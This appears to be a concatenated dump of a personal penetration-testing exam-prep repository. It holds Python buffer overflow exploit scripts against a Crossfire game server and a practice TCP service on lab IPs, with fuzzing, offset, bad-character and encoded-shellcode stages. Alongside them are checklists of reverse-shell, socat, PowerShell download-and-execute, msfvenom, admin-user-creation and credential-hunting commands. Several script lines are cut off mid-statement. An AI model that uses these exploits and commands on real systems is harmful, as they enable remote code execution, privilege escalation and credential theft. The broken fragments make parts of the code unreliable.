"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 11 | 
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 12 | 13 | Shellcode="A" * 4377+"B" * 4 + badchars 14 | pre_buff="\x11(setup sound " 15 | 16 | post_buff = "x90\x00#" 17 | 18 | try: 19 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 20 | s.connect(('192.168.0.131',13327)) 21 | print ("Sending payload to remote server..........") 22 | s.send((pre_buff + Shellcode+ post_buff)) 23 | s.close() 24 | print("Payload send......") 25 | 26 | except: 27 | print("Error in connecting remote server........!") 28 | sys.exit() 29 | -------------------------------------------------------------------------------- /BufferOverflow/crossfire/eip.py: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | import sys, socket 3 | 4 | 5 | 6 | offset='A'*4377 + 'B'*4 7 | pre_buff="\x11(setup sound " 8 | 9 | post_buff = "x90\x00#" 10 | 11 | try: 12 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 13 | s.connect(('192.168.0.131',13327)) 14 | print ("Sending payload to remote server..........") 15 | s.send((pre_buff + offset + post_buff)) 16 | s.close() 17 | print("Payload send......") 18 | 19 | except: 20 | print("Error in connecting remote server........!") 21 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/crossfire/fuzz.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | from time import sleep 3 | 4 | buffer ="A" * 100 5 | pre_buff="\x11(setup sound " 6 | 7 | post_buff = "x90\x00#" 8 | 9 | while True: 10 | try: 11 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 12 | s.connect(('192.168.0.131',13327)) 13 | print "Trying with buffer length %d" % len(buffer) 14 | s.send((pre_buff + buffer + post_buff)) 15 | s.close() 16 | sleep(1) 17 | buffer=buffer + "A"*100 18 | 19 | 20 | except: 21 | print("Fuzzing Crashed at %s by" % 
str(len(buffer))) 22 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/crossfire/offset.py: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | import sys, socket 3 | 4 | 5 | 6 | offset='A' * 4368 + 'B' * 4 7 | pre_buff="\x11(setup sound " 8 | 9 | post_buff = "x90\x00#" 10 | 11 | try: 12 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 13 | s.connect(('192.168.0.131',13327)) 14 | print ("Sending payload to remote server..........") 15 | s.send((pre_buff + offset + post_buff)) 16 | s.close() 17 | print("Payload send......") 18 | 19 | except: 20 | print("Error in connecting remote server........!") 21 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/crossfire/walk: -------------------------------------------------------------------------------- 1 | "Cross fire" 2 | 3 | 4 | IP 192.168.0.131 5 | 6 | 13327/tcp open crossfire Crossfire game server 1.9.0 or earlier 7 | 8 | 9 | 1 finding ser ver crash and offset for buffer 10 | 11 | crash at 4800 12 | offset => 4377 13 | 14 | 2. 
15 | -------------------------------------------------------------------------------- /BufferOverflow/dostackbufferoverflowgood/Bad_char.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | import socket 3 | 4 | RHOST = "192.168.0.134" 5 | RPORT = 31337 6 | 7 | buf_totlen=1024 8 | esp=146 9 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 10 | s.connect((RHOST, RPORT)) 11 | 12 | 13 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 14 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 15 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 16 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 17 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 18 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 19 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 20 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 21 | 22 | 23 | buf = "" 24 | buf += "A"*( esp- len(buf)) #padding 25 | buf += "BBBB" #SRP Overwrite 26 | buf += "CCCC" #ESP pointer 27 | buf += badchars #trailing 28 | buf += "\n" 29 | 30 | try: 31 | print"Sending Paylaod to remote server....." 32 | s.send('USER test\r\n') 33 | s.recv(1024) 34 | s.send(buf) 35 | s.send('QUIT\r\n') 36 | s.close() 37 | 38 | except: 39 | print"Failed to connect/....." 
-------------------------------------------------------------------------------- /BufferOverflow/dostackbufferoverflowgood/EIP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | import socket 3 | 4 | RHOST = "192.168.0.134" 5 | RPORT = 31337 6 | 7 | buf_totlen=1024 8 | esp=146 9 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 10 | s.connect((RHOST, RPORT)) 11 | 12 | buf = "" 13 | buf += "A"*( esp- len(buf)) #padding 14 | buf += "BBBB" #SRP Overwrite 15 | buf += "CCCC" 16 | #buf += "\xCC\xCC\xCC\xCC" #ESP pointer 17 | buf += "D"*(buf_totlen - len(buf)) #trailing 18 | buf += "\n" 19 | 20 | try: 21 | print"Sending Paylaod to remote server....." 22 | s.send('USER test\r\n') 23 | s.recv(1024) 24 | s.send(buf) 25 | s.send('QUIT\r\n') 26 | s.close() 27 | 28 | except: 29 | print"Failed to connect/....." -------------------------------------------------------------------------------- /BufferOverflow/dostackbufferoverflowgood/Fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sys,socket 3 | 4 | # Create an array of buffers from 10 to 2000 with increments of 20. 
5 | buffe="" 6 | buffe+="A" * 1100 7 | buffe+="\n" 8 | 9 | 10 | try: 11 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 12 | s.connect(('192.168.0.134',31337)) 13 | print "Trying with buffer length %d" % len(buffe) 14 | s.send((buffe)) 15 | s.recv(1024) 16 | s.close() 17 | 18 | #buffe=buffe + "A"*100 19 | 20 | 21 | except: 22 | print("Fuzzing Crashed at %s by" % str(len(buffe))) 23 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/dostackbufferoverflowgood/Pattern.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | import socket 3 | 4 | RHOST = "192.168.0.134" 5 | RPORT = 31337 6 | 7 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 8 | s.connect((RHOST, RPORT)) 9 | 10 | buf = "" 11 | buf += ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk") 12 | buf += "\n" 13 | 14 | try: 15 | print"Sending Paylaod 
to remote server....." 16 | s.send('USER test\r\n') #send junk as username 17 | s.recv(1024) 18 | s.send(buf) 19 | s.send('QUIT\r\n') 20 | s.close() 21 | 22 | except: 23 | print"Failed to connect/....." -------------------------------------------------------------------------------- /BufferOverflow/dostackbufferoverflowgood/Shellcode.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import struct 3 | 4 | RHOST = "192.168.0.134" 5 | RPORT = 31337 6 | 7 | buf_totlen=1024 8 | esp=146 9 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 10 | s.connect((RHOST, RPORT)) 11 | 12 | 13 | Shellcode=("\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e" 14 | "\xfa\x33\xee\x92\x83\xee\xfc\xe2\xf4\x06\xdb\x6c\x92\xfa\x33" 15 | "\x8e\x1b\x1f\x02\x2e\xf6\x71\x63\xde\x19\xa8\x3f\x65\xc0\xee" 16 | "\xb8\x9c\xba\xf5\x84\xa4\xb4\xcb\xcc\x42\xae\x9b\x4f\xec\xbe" 17 | "\xda\xf2\x21\x9f\xfb\xf4\x0c\x60\xa8\x64\x65\xc0\xea\xb8\xa4" 18 | "\xae\x71\x7f\xff\xea\x19\x7b\xef\x43\xab\xb8\xb7\xb2\xfb\xe0" 19 | "\x65\xdb\xe2\xd0\xd4\xdb\x71\x07\x65\x93\x2c\x02\x11\x3e\x3b" 20 | "\xfc\xe3\x93\x3d\x0b\x0e\xe7\x0c\x30\x93\x6a\xc1\x4e\xca\xe7" 21 | "\x1e\x6b\x65\xca\xde\x32\x3d\xf4\x71\x3f\xa5\x19\xa2\x2f\xef" 22 | "\x41\x71\x37\x65\x93\x2a\xba\xaa\xb6\xde\x68\xb5\xf3\xa3\x69" 23 | "\xbf\x6d\x1a\x6c\xb1\xc8\x71\x21\x05\x1f\xa7\x5b\xdd\xa0\xfa" 24 | "\x33\x86\xe5\x89\x01\xb1\xc6\x92\x7f\x99\xb4\xfd\xcc\x3b\x2a" 25 | "\x6a\x32\xee\x92\xd3\xf7\xba\xc2\x92\x1a\x6e\xf9\xfa\xcc\x3b" 26 | "\xc2\xaa\x63\xbe\xd2\xaa\x73\xbe\xfa\x10\x3c\x31\x72\x05\xe6" 27 | "\x79\xf8\xff\x5b\x2e\x3a\xfa\xb4\x86\x90\xfa\x37\x3c\x1b\x1c" 28 | "\x59\xfe\xc4\xad\x5b\x77\x37\x8e\x52\x11\x47\x7f\xf3\x9a\x9e" 29 | "\x05\x7d\xe6\xe7\x16\x5b\x1e\x27\x58\x65\x11\x47\x92\x50\x83" 30 | "\xf6\xfa\xba\x0d\xc5\xad\x64\xdf\x64\x90\x21\xb7\xc4\x18\xce" 31 | "\x88\x55\xbe\x17\xd2\x93\xfb\xbe\xaa\xb6\xea\xf5\xee\xd6\xae" 32 | 
"\x63\xb8\xc4\xac\x75\xb8\xdc\xac\x65\xbd\xc4\x92\x4a\x22\xad" 33 | "\x7c\xcc\x3b\x1b\x1a\x7d\xb8\xd4\x05\x03\x86\x9a\x7d\x2e\x8e" 34 | "\x6d\x2f\x88\x0e\x8f\xd0\x39\x86\x34\x6f\x8e\x73\x6d\x2f\x0f" 35 | "\xe8\xee\xf0\xb3\x15\x72\x8f\x36\x55\xd5\xe9\x41\x81\xf8\xfa" 36 | "\x60\x11\x47") 37 | 38 | jmp_esp=struct.pack(" \xc3\x14\x04\08 19 | 0x080416BF =>\xbf\x16\x04\x08 20 | 21 | 6. sendpaylaod 22 | jmp_esp=struct.pack(" 43366843 14 | 4. Offset finding =>1788 15 | 5. Check offset and data to control EIP"A"* 1788 + "B" * 4 + "C" * 300 16 | 6. Bad cahracter finding (\x00\x0d) 17 | 7. Find JMP ESP (!mona find -s "\xff\xe4" -m user32.dll) 18 | 8. 75FB94E3 FFE4 JMP ESP ==> \xe3\x94\xfb\x75 19 | 9. making bind shell (msfvenom -p windows/shell_bind_tcp -f c -b "\x00\x0d") 20 | 10. send final exploit 21 | 11 taking shell -------------------------------------------------------------------------------- /CTF_template.ctb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mrnmap/OSCP2020/f1cca5e58d298e56564cd87715b0469ab2eb5e73/CTF_template.ctb -------------------------------------------------------------------------------- /Checklist/File_trr: -------------------------------------------------------------------------------- 1 | 2 | Server 3 | { 4 | # HTTP - Apache2 5 | # cp file /var/www/html/file_name 6 | sudo service apache2 start 7 | 8 | # HTTP - Python. 
Default port 8000 9 | # python2 10 | sudo python -m SimpleHTTPServer 80 11 | # python3 12 | sudo python3 -m http.server 80 13 | 14 | # SMB 15 | sudo impacket-smbserver 16 | 17 | # FTP 18 | # apt-get install python-pyftpdlib 19 | sudo python -m pyftpdlib -p 21 20 | 21 | # TFTP (UDP) 22 | sudo atftpd --daemon -port 69 /path/to/serve 23 | 24 | # Netcat 25 | nc -nvlp < file/to/send 26 | } 27 | 28 | Linux - HTTP 29 | 30 | { 31 | # Wget 32 | wget http:///file_name -O /path/to/save/file 33 | 34 | # Netcat 35 | nc -nv > file/to/recv 36 | 37 | # cURL 38 | curl http:///file_name --output file_name 39 | 40 | } 41 | 42 | Windows 43 | { 44 | HTTP 45 | # Does not save file on the system 46 | powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http:///')" 47 | # Saves file on the system 48 | powershell.exe -nop -ep bypass -c "iwr -uri http:/// -outfile path/to/save/file_name" 49 | powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadFile('http:///','path/to/save/file_name')" 50 | certutil.exe -urlcache -split -f http:///file file_save 51 | } 52 | 53 | Wget.ps1 54 | { 55 | echo $storageDir = $pwd >> wget.ps1 56 | $webclient = New-Object System.Net.WebClient >> wget.ps1 57 | # Download file from 58 | $url = "http:///file_name" >> wget.ps1 59 | # Save file as 60 | $file = "file_name" 61 | echo $webclient.DownloadFile($url,$file) >>wget.ps1 62 | # execute the script as follows 63 | powershell.exe -nop -ep bypass -nol -noni -f wget.ps1 64 | } 65 | 66 | TFTP (UDP) 67 | { 68 | tftp -i get file_name 69 | } 70 | 71 | SMB 72 | { 73 | # cmd.exe 74 | net use Z: \\\share_name 75 | # To access the drive 76 | Z: 77 | # PowerShell 78 | New-PSDrive -Name "notmalicious" -PSProvider "FileSystem" -Root "\\attacker_ip\share_name" 79 | # To access the drive 80 | notmalicious: 81 | } 82 | 83 | FTP 84 | { 85 | ftp 86 | ftp>binary 87 | ftp>get file_name 88 | 89 | # One-liner downloader 90 | # in cmd.exe do not use quotes in an echo command 91 | echo open 
>> download.txt 92 | echo anonymous >> download.txt 93 | echo anon >> download.txt 94 | echo binary >> download.txt 95 | get file_name >> download.txt 96 | bye >> download.txt 97 | } 98 | ftp -s:download.txt -------------------------------------------------------------------------------- /Checklist/Port_forwarding: -------------------------------------------------------------------------------- 1 | Port Forwarding 2 | 3 | 4 | Remote Port 5 | 6 | { 7 | #ssh -R 7000:127.0.0.1:8000 user@example.com 8 | 9 | cat /etc/ssh/sshd_config 10 | enable PermitRootLogin yes 11 | service ssh restart 12 | .\plink.exe root@ip -R 445:127.0.0.1:445 13 | 14 | plink .exe uname@ip -R rpot:127.0.0.1 :port 15 | } 16 | 17 | # Web 18 | Always check the source code with Ctrl+U 19 | 20 | # Entry point 21 | Enumerate everything, including enumerating what you just enumerated 22 | 23 | # Exploits 24 | Search for publicly available exploits or PoC to make sure no unnecessary shit is happening when exploiting it 25 | 26 | # Enumeration 27 | If the web application redirects everything back into it's main page, try enumerating it with Burp Suite built-in Spider tool 28 | 29 | # Bypassing User-Agent Blacklist 30 | Some application will not respond to common directory enumeration tool(Gobuster/Dirb) because it blocks the tool by checking the User Agent. 31 | To bypass this, simply run the tool with a custom User Agent with it. 32 | dirb http://10.10.10.58:3000 33 | WARNING: NOT_FOUND[] page not stable, unable to determine the correct URLs {200}. 34 | dirb http://10.10.10.58:3000 -a Custom User Agent -------------------------------------------------------------------------------- /Checklist/TTY: -------------------------------------------------------------------------------- 1 | 2 | 1. python -c 'import pty; pty.spawn("/bin/bash")' 3 | python -c "import pty; pty.spawn('/bin/bash')" 4 | 5 | 2. 
socat 6 | { 7 | kali => socat file:`tty`,raw,echo=0 tcp-listen:4444 8 | victim => socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 9 | 10 | } 11 | 3. in reverse shell Ctrl+z 12 | stty raw -echo 13 | fg 14 | 15 | export TERM=xterm 16 | 17 | export SHELL=bash 18 | $ export TERM=xterm256-color 19 | $ stty rows 38 columns 116 20 | 21 | 22 | 23 | 24 | 25 | https://www.youtube.com/watch?v=-f-XFAVMDQ8&list=PLqM63j87R5p4Mp4NP-Oa1kLV6o22RDfex 26 | 27 | https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f 28 | 29 | SC -------------------------------------------------------------------------------- /Checklist/WinPriEsc_Checklist: -------------------------------------------------------------------------------- 1 | Privilege Escalation Windows 2 | 3 | Script 4 | { 5 | 6 | 7 | } 8 | 9 | 10 | # basic Commands 11 | 12 | 1. hostname =>(find hostname of system) 13 | 2. whoami / priv =>(find currently logged-in user)\ 14 | 3. systeminfo =>(complete systeminfo) 15 | 4. User operations{ 16 | net users =>(users of machine) 17 | 18 | net localgroups => localgroups 19 | 20 | net user uname => details about user 21 | 22 | net user uname pwd /add => add user 23 | 24 | net localgroup administrators hacker/add => make admin 25 | 26 | 27 | 28 | 29 | } 30 | 31 | 7. net group /domain => View domain groups 32 | 8. netsh firewall show state / config => firewall setting 33 | 9. route print => network routing table 34 | 10.arp -a => arp entries 35 | 11. netstat -ano => internal ports and services 36 | 12. echo %path% => print path variable entries 37 | 38 | 39 | 40 | 13. wmic qfe get Caption,Description,HotFixID,InstalledOn => how well the system is patched 41 | 42 | 14. schtasks /query /fo LIST /v => display verbose output for all scheduled tasks 43 | 44 | 15. tasklist /SVC => links running processes to started services. 45 | 46 | 16. net start => services that are started 47 | 48 | 17. 
DRIVERQUERY => list of installed 3rd-party drivers 49 | 50 | 51 | 52 | 18 The command below will search the file system for file names containing certain keywords. You can 53 | specify as many keywords as you wish. 54 | 55 | dir /s *pass* == *cred* == *vnc* == *.config* 56 | 57 | findstr /si password *.xml *.ini *.txt 58 | 59 | 19 Similarly the two commands below can be used to grep the registry for keywords, in this case "password". 60 | 61 | reg query HKLM /f password /t REG_SZ /s 62 | reg query HKCU /f password /t REG_SZ /s 63 | 64 | 65 | 66 | 67 | 68 | -------------------------------------------------------------------------------- /Checklist/buffer overflow checklist: -------------------------------------------------------------------------------- 1 | 1. Find Victim IP and port {verify by nc -nv ip port} 2 | 3 | 2. Add IP and port to fuzzing script + check any additional parameter 4 | 5 | 3. Use Fuzzing script to find crash point 6 | 7 | 4. Check EIP overwrite by payloads 8 | 9 | 10 | 5. generate unique pattern of crash size via script 11 | 12 | (/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l size) 13 | 14 | 6. add pattern in script, send pattern and check for crash 15 | 16 | 7. note the value of EIP and calculate offset via 17 | (/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l size -q eip_value) 18 | 19 | 8. Display all .dll modules via mona 20 | 21 | (!mona modules) 22 | 23 | 9. Finding JMP ESP in {user32.dll || Shell32.dll} 24 | 25 | (!mona find -s "\xff\xe4" -m shell32.dll) 26 | 27 | 10. note the value of the register 28 | 29 | 11. put JMP ESP reg_add in "EIP" and check if EIP is controlled 30 | 31 | 12. Send bad chars and find bad characters {\x00\x}; resend again and find all bad characters 32 | 33 | 13 Add padding before shellcode ("\x90" * 10) and finalize buffer {eg => Shellcode="A" * 2003 + "\xaf\x11\x50\x62" + "\x90" *32 +exploit 34 | } 35 | 36 | 14. 
Make shellcode via 37 | (msfvenom -p windows/shell_reverse_tcp LHOS=ip LPORT=1234 EXITFUNC=thread -f c -b "\x00") 38 | 39 | 16. Send final payload and get reverse shell 40 | 41 | 42 | 43 | 17 Convert the JMP ESP address to little endian (byte order reversed) 44 | 45 | jmp_esp=struct.pack('